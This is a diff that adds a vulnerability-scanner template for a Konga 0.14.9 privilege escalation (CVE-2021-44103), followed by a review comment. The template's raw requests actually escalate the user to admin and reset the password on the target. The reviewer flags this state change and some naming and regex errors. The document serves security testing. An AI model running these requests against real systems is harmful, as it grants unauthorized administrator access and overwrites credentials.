diff --git a/cves/2021/CVE-2021-44103.yaml b/cves/2021/CVE-2021-44103.yaml
new file mode 100644
index 0000000000..e4cc95c704
--- /dev/null
+++ b/cves/2021/CVE-2021-44103.yaml
@@ -0,0 +1,78 @@
+id: CVE-2021-44103
+
+info:
+ name: KOGA 0.14.9 - Privilege Escalation
+ author: rschio
+ severity: high
+ description: Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
+ reference:
+ - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
+ - https://www.exploit-db.com/exploits/50521
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103
+ classification:
+ cvss-score: 8.7
+ cve-id: CVE-2021-44103
+ cwe-id: CWE-264
+ tags: cve,cve2021,konga,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"password": "{{password}}", "identifier": "{{username}}"}
+
+ - |
+ POST /api/user/{{id}} HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}
+ Content-Type: application/json;charset=utf-8
+
+ {"token": "{{token}}"}
+
+ - |
+ PUT /api/user/{{id}} HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Referer: {{BaseURL}}
+ Content-Type: application/json;charset=utf-8
+
+ {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"}
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "\"admin\": false")'
+ - 'contains(body_3, "\"admin\": true")'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ name: id
+ internal: true
+ group: 1
+ regex:
+ - '"id": ([0-9]+)'
+
+ - type: regex
+ part: body
+ name: token
+ internal: true
+ group: 1
+ regex:
+ - '"token": "(.*)"'
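Review bot: The third request (`PUT /api/user/{{id}}`) is not a read-only probe: it writes `"admin": "true"` together with a new `passports` password to the authenticated account, so a successful run leaves the scanned Konga instance with a persistently elevated user and a rewritten local credential, and nothing in the template says so. That should be stated in the template, either with an `intrusive` tag if this repository uses that convention or with a comment above the request such as `# NOTE: state-changing — sets admin=true and overwrites the user's local password on the target`. Separately, `name: KOGA 0.14.9 - Privilege Escalation` misspells the product while the description and tags use `KONGA`/`konga`; `name: Konga 0.14.9 - Privilege Escalation` keeps them consistent. The `token` extractor `'"token": "(.*)"'` is greedy and would capture past the token if the login body is a single line with further quoted fields after it; `'"token": "([^"]+)"'` is the safer form.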